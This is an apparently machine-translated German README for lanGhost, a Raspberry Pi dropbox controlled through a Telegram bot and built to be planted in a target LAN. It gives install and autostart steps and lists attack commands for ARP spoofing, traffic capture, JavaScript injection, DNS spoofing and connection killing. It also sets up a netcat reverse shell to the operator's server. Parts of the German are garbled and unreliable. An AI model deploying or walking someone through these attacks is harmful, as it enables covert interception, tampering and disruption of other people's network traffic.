Langhost ist für Himbeer -PIs ( Raspbian / Kali für RPI ) ausgelegt. Das Ausführen von Distribos für andere/Desktop -Distrikte kann zu Problemen führen und funktionieren möglicherweise nicht wie ausgenommen.
Sie benötigen einen Raspberry Pi mit frischem Raspbian/Kali auf der SD -Karte, da Sie nicht möchten, dass etwas anderes im Hintergrund läuft.
Starten Sie den PI, lassen Sie einen SSH einen Monitor und eine Tastatur verkaufen oder verbinden und geben Sie diese Befehle ein:
$ sudo apt update && sudo apt install python3 python3-pip
$ git clone https://github.com/xdavidhu/lanGhost
$ cd lanGhost
$ sudo ./setup.py
Bitte lesen Sie die Fragen/Nachrichten, während Sie das Setup -Skript ausführen!
[+] Please enter the name of the network interface connected/will
be connected to the target LAN. Default wired interface is 'eth0',
and the default wireless interface is 'wlan0' on most systems, but
you can check it in a different terminal with the 'ifconfig' command.
[+] Please create a Telegram API key by messaging @BotFather on Telegram
with the command '/newbot'.
After this, @BotFather will ask you to choose a name for your bot.
This can be anything you want.
Lastly, @BotFather will ask you for a username for your bot. You have
to choose a unique username here which ends with 'bot'. For
example: xdavidbot. Make note of this username, since later
you will have to search for this to find your bot, which lanGhost
will be running on.
After you send your username of choise to @BotFather, you will recieve
your API key.
[+] Now for lanGhost to only allow access to you, you need to verify yourself.
Send the verification code below TO THE BOT you just created. Just search for your
bot's @username (what you sent to @BotFather) to find it.
[+] Verification code to send: ******
[+] Do you want lanGhost to start on boot? This option is necessary if you are using
this device as a dropbox, because when you are going to drop this device into a
network, you will not have the chanse to start lanGhost remotely! (autostart works
by adding a new cron '@reboot' entry)
Es wird nicht empfohlen, Langhost in einem Netzwerk zu verwenden, das größer als /24 ist, da die Scans zu lange dauern werden.
Langhost ist nicht ruhig . Jeder, der den Verkehr überwacht, kann die ARP -Pakete sehen!
Wenn Sie bei step 4/4 (autostart)
yes
ausgewählt haben, ist der PI zum Abnehmen vollständig eingerichtet. Langhost sollte mit dem Boot beginnen und Ihnen eine Nachricht im Telegramm mit dem Text senden: lanGhost started! ?
.
Probieren Sie es zuerst in Ihrem Labor aus und testen Sie, ob Langhost auf Ihre Nachrichten reagiert!
Wenn Sie alle eingestellt sind, schließen Sie es einfach an das Zielnetzwerk an, indem Sie das Ethernet -Kabel in den PI einfügen und die Stromversorgung über Micro USB anschließen, und Sie sind bereit zu gehen!
(Langhost kann auch über WLAN arbeiten, aber Sie müssen wpa_supplicant
einrichten, um zuerst automatisch eine Verbindung zum Netzwerk herzustellen)
/scan - Scan LAN network
/scanip [TARGET-IP] - Scan a specific IP address.
/kill [TARGET-IP] - Stop the target's network connection.
/mitm [TARGET-IP] - Capture HTTP/DNS traffic from target.
/replaceimg [TARGET-IP] - Replace HTTP images requested by target.
/injectjs [TARGET-IP] [JS-FILE-URL] - Inject JavaScript into HTTP pages requested by target.
/spoofdns [TARGET-IP] [DOMAIN] [FAKE-IP] - Spoof DNS records for target.
/attacks - View currently running attacks.
/stop [ATTACK-ID] - Stop a currently running attack.
/restart - Restart lanGhost.
/reversesh [TARGET-IP] [PORT] - Create a netcat reverse shell to target.
/help - Display the help menu.
/ping - Pong.
Sie können einen Angriff mit einem dieser Befehle starten: /kill, /mitm, /replaceimg, /injectjs, /spoofdns
Wenn Sie einen oder mehrere Angriffe laufen lassen, können Sie den Befehl /attack
verwenden, um eine Liste von ihnen zu erhalten, die die ATTACK-ID
enthält.
Um einen Angriffstyp zu stoppen /stop [ATTACK-ID]
.
/reversesh
stellt nur eine NetCat -TCP -Verbindung her, die nicht verschlüsselt ist und der gesamte Verkehr überwacht werden kann! Verwenden Sie es nur für Notfallfixes oder für die Einrichtung einer verschlüsselten Rückverbindung, falls erforderlich.
Der Befehl /reversesh
dient zum Erhalten einer Reverse Shell am PI, wenn es von außen nicht zugänglich ist.
Um den Befehl /reversesh
zu verwenden, müssen Sie einen Server auf die Shell anhören.
Befehl netcat, um den Hörer auf Ihrem Server zu starten:
$ nc -l 0.0.0.0 [PORT]
Telegrammkommando:
/reversesh [IP-of-your-listening-server] [PORT]
/kill
- Stoppt die Internetkonnektivität für das Ziel./mitm
- erfasst den HTTP- und DNS -Verkehr vom Ziel und sendet ihn in Textnachrichten./replaceimg
- Ersetzt HTTP -Bilder für das Ziel, um welches Bild Sie an den Bot senden./injectjs
- Injiziert JavaScript in jede HTTP -HTML -Antwort für das Ziel. Sie müssen die JS -Datei auf Ihrem Server hosten und die URL als Parameter angeben./spoofdns
- Spoofs -DNS -Antworten für das Ziel.Alle Angriffe verwenden ARP -Spoofing !
/scan
- scannt das lokale Netzwerk und gibt die Hosts online zurück. Verwendet nmap -sn
-Scan, um Hosts zu entdecken./scanip
- Scans einer IP -Adresse für geöffnete Ports und andere Informationen. Verwendet nmap -sS
-Scan.Sie erhalten jedes Mal eine Nachricht, wenn ein neues Gerät das Netzwerk verbindet/verlässt.
Copyright (c) 2018 von David Schütz. Einige Rechte vorbehalten.
Langhost steht in der MIT -Lizenz, nach allen in der Lizenzdatei angegebenen Erläuterungen. Sie können mir auch unter XDAVID {at} Protonmail {dot} com eine E -Mail senden.